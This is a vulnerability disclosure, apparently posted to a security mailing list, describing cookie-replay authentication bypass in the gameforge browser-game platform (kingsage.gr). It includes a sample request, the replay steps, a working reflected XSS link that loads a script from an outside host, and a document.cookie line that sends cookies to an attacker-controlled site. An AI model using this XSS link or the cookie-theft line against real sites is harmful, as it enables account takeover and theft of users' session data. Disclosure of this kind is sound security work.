Dear all,

I'd like to inform you about a security vulnerability in gameforge.de gaming
platform.

This vulnerability is validated only for kingsage.gr (versions 0.1.17,
0.1.18 and 0.1.19 - latest) but might affect all games developed under the
specific gaming platform (e.g.: ikariam, gladiatus, katsuro, battleknight,
bitefight, etc.)

=========================== Authentication bypass using hashed values
====================

After the initial login into the game all following plain HTTP GET/POST
requests are similar to this:

GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml,
application/x-silverlight, */*
Referer:
http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR
1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698;
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user;
game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive

which, among others, include three critical elements:

village=24482 [The village number - can be found for any user from within
the game]
game_user=some.user [The users' username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the users'
password]

Taking into account that this traffic, which is plain HTTP can be sniffed
and that the games' cookies do not expire, a malicious user - by obtaining
another users' cookies *once* - can bypass authentication and access the
application/game as another user *at any time*.

The steps are the following.

1. The malicious user uses his/her personal account to enter the game
2. The malicious user modifies any following request by deleting
SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTS only the
village, game_user and game_pass values that he/she has obtained.

Using this approach a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.

=========================== Vulnerability Impact (Correlated with Cross Site
Scripting) =============

The existence of Cross Site Scripting at the gaming platform raises the
impact of the vulnerability:

As an example if malicious user [A] sends to user [B] a message like this:

[url]
http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]<http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E%5B/url%5D>

*From withing the games' messaging functionality*

User [A] is able to inject/include malicious javascript code [<SCRIPT
SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie -
which includes all sensitive information for the attack described in the
first part - of user [B]

(This can be accomplished using e.g.: document.location='
http://user_a_controlled_site?cookie='+document.cookie<http://user_a_controlled_site/?cookie=%27+document.cookie>;
in the maliciouscode.js)

Kind regards,

mestre.rigel